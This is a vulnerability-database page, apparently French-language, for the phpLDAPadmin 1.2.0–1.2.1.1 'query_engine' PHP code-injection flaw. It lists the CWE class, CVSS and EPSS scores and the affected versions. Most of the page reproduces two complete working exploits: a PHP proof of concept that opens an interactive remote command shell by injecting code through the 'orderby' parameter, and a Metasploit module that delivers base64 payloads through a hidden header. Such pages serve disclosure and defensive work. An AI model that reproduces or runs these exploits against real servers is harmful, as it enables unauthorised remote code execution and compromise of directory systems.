Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-94 |
Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 18021
Date de publication : 2011-10-22 22h00 +00:00
Auteur : EgiX
EDB Vérifié : Yes
<?php
/*
------------------------------------------------------------------------
phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit
------------------------------------------------------------------------
author...............: EgiX
mail.................: n0b0d13s[at]gmail[dot]com
software link........: http://phpldapadmin.sourceforge.net/
affected versions....: from 1.2.0 to 1.2.1.1
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] vulnerable code in /lib/functions.php
1002. function masort(&$data,$sortby,$rev=0) {
1003. if (defined('DEBUG_ENABLED') && DEBUG_ENABLED && (($fargs=func_get_args())||$fargs='NOARGS'))
1004. debug_log('Entered (%%)',1,0,__FILE__,__LINE__,__METHOD__,$fargs);
1005.
1006. # if the array to sort is null or empty
1007. if (! $data) return;
1008.
1009. static $CACHE = array();
1010.
1011. if (empty($CACHE[$sortby])) {
1012. $code = "\$c=0;\n";
1013.
1014. foreach (explode(',',$sortby) as $key) {
1015. $code .= "if (is_object(\$a) || is_object(\$b)) {\n";
1016.
1017. $code .= " if (is_array(\$a->$key)) {\n";
1018. $code .= " asort(\$a->$key);\n";
1019. $code .= " \$aa = array_shift(\$a->$key);\n";
....
1078. $code .= 'return $c;';
1079.
1080. $CACHE[$sortby] = create_function('$a, $b',$code);
1081. }
The $sortby parameter passed to 'masort' function isn't properly sanitized before being used in a call to create_function()
at line 1080, this can be exploited to inject and execute arbitrary PHP code. The only possible attack vector is when handling
the 'query_engine' command, here input passed through $_REQUEST['orderby'] is passed as $sortby parameter to 'masort' function.
[-] Disclosure timeline:
[30/09/2011] - Vulnerability discovered
[02/10/2011] - Issue reported to http://sourceforge.net/support/tracker.php?aid=3417184
[05/10/2011] - Fix committed: http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;h=76e6dad
[23/10/2011] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "\n+-------------------------------------------------------------------+";
print "\n| phpLDAPadmin <= 1.2.1.1 Remote PHP Code Injection Exploit by EgiX |";
print "\n+-------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /phpldapadmin/htdocs/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");
$phpcode = "foo));}}error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die;/*";
$payload = "cmd=query_engine&query=none&search=1&orderby={$phpcode}";
$packet = "POST {$path}cmd.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
while(1)
{
print "\nphpldapadmin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
Exploit Database EDB-ID : 18031
Date de publication : 2011-10-24 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# $Id: phpldapadmin_query_engine.rb 14060 2011-10-25 05:25:39Z sinn3r $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Payload::Php
def initialize(info = {})
super(update_info(info,
'Name' => 'phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability in the lib/functions.php that allows
attackers input parsed directly to the create_function() php function. A patch was
issued that uses a whitelist regex expression to check the user supplied input
before being parsed to the create_function() call.
},
'Author' =>
[
'EgiX <n0b0d13s[at]gmail-com>', # original discovery/poc
'mr_me <steventhomasseeley[at]gmail-com>', # msf
'TecR0c <roccogiovannicalvi[at]gmail-com >', # msf
],
'License' => MSF_LICENSE,
'Version' => '$Revision: 14060 $',
'References' =>
[
['BID', '50331'],
['URL', 'http://sourceforge.net/support/tracker.php?aid=3417184'],
['URL', 'http://www.exploit-db.com/exploits/18021/'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 4000,
'Keys' => ['php'],
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Oct 24 2011',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "phpLDAPadmin directory path", "/phpldapadmin/htdocs/"]),
], self.class)
end
def check
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri,
}, 3)
if (res and res.body =~ /phpLDAPadmin \(1\.2\.[0|1]\.\d/i)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def get_session
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'index.php'
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri,
}, 3)
if (not res.headers['Set-Cookie'])
print_error("Could not generate a valid session")
return
end
return res.headers['Set-Cookie']
end
def cleanup
# We may not be using php/exe again, so clear the CMD option
if datastore['CMD']
datastore['CMD'] = nil
end
end
def exploit
# if we are using the exec CMD stager
# important to check which php functions are disabled
if datastore['CMD']
cmd = Rex::Text.encode_base64(datastore['CMD'])
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
out = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<-END_OF_PHP_CODE
$c = base64_decode("#{cmd}");
#{php_preamble({:disabled_varname => dis})}
#{php_system_block({:cmd_varname=>"$c", :disabled_varname => dis, :output_varname => out})}
echo #{out};
END_OF_PHP_CODE
p = Rex::Text.encode_base64(Rex::Text.compress(shell))
else
p = Rex::Text.encode_base64(payload.encoded)
end
# Generate some random strings
hidden_header = rand_text_alpha_upper(6)
fake_func_name = rand_text_alpha_upper(2)
# build sttack string
php_code = "#{fake_func_name}));}}error_reporting(0);eval(base64_decode(\$_SERVER[HTTP_#{hidden_header}]));die;/*"
data = "cmd=query_engine&query=none&search=1&orderby=#{php_code}\r\n\r\n"
session = get_session
uri = ''
uri << datastore['URI']
uri << '/' if uri[-1,1] != '/'
uri << 'cmd.php'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => uri,
'data' => data,
'headers' =>
{
"#{hidden_header}" => p,
'Cookie' => session,
'Connection' => 'Close',
},
}, 3)
print_status("%s" % res.body) if datastore['CMD']
end
end
Products Mentioned
Configuraton 0
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0.1
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0.2
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0.3
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0.4
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.0.5
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.1
Phpldapadmin_project>>Phpldapadmin >> Version 1.2.1.1
Références